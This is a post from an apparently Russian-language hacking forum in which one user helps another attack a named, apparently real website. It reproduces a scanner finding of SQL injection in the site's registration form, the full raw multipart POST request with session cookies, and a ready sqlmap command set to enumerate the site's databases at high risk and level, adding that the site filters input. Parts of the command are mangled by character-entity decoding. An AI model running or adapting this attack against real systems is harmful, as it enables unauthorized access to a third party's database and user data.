03.06.2020, 18:49
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами:
5025206
Репутация:
5
|
|
Сообщение от Axiles
↑
Добрый день,подскажите пожалуйста как вставить вот такую пост ссылку в мап.Я так понимаю нужно прописать еще --data.спасибо
http://prntscr.com/st216j
Код:
The vulnerability affects https://aachibilyaev.com/cabinet/registration/ , REGISTER[EMAIL]
Discovered by SQL injection
Attack Details
arrow_drop_up
POST (multipart) input REGISTER[EMAIL] was set to 1'"
Error message found:
You have an error in your SQL syntax
Код:
POST /cabinet/registration/?backurl=/cabinet/®ister=yes HTTP/1.1
Content-Type: multipart/form-data; boundary=----------Q9OXvYdJGy9b
Referer: https://aachibilyaev.com/
Cookie: PHPSESSID=ivp6k01981u5ild8o166grp2r0;BITRIX_SM_GUEST_ID=139605;BITRIX_SM_LAST_VISIT=03.06.2020+14%3A00%3A45;io=NVTaYGNo3vUnQsF_AAiQ;tmr_reqNum=26;BITRIX_CONVERSION_CONTEXT_s1=%7B%22ID%22%3A1%2C%22EXPIRE%22%3A1591217940%2C%22UNIQUE%22%3A%5B%22conversion_visit_day%22%5D%7D;catalogViewMode=list;_ym_debug=null;last_visit=1591170065298::1591180865298;top100_id=t1.6912325.390564327.1591180865288
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 1021
Host: aachibilyaev.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[CONFIRM_PASSWORD]"
g00dPa$$w0rD
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[EMAIL]"
1'"
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[LOGIN]"
1
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[NAME]"
TWSfSopc
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[PASSWORD]"
g00dPa$$w0rD
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[PERSONAL_PHONE]"
555-666-0606
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="backurl"
/cabinet/
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="licenses_popup"
Y
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="register_submit_button"
reg
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="register_submit_button1"
register_submit_button1=Регистрация
------------Q9OXvYdJGy9b--
sqlmap.py --url " https://aachibilyaev.com/cabinet/reg.../?register=yes" --data="backurl=/cabinet/login/®iste
r_submit_button=reg®ISTER[NAME]=asdasd®ISTER=1*®ISTER[PERSONAL_PHONE]=+7 (123) 123-12-31®ISTER[PASSWORD]=1234567®ISTER[CONFIRM_PASSWORD]=1234567®I
STER[LOGIN]=1&licenses_popup=Y®ister_submit_button1=Рег истрация" --dbs --risk=3 --level=3 --dbms=mysql
p.s там фильтрация
|
|
|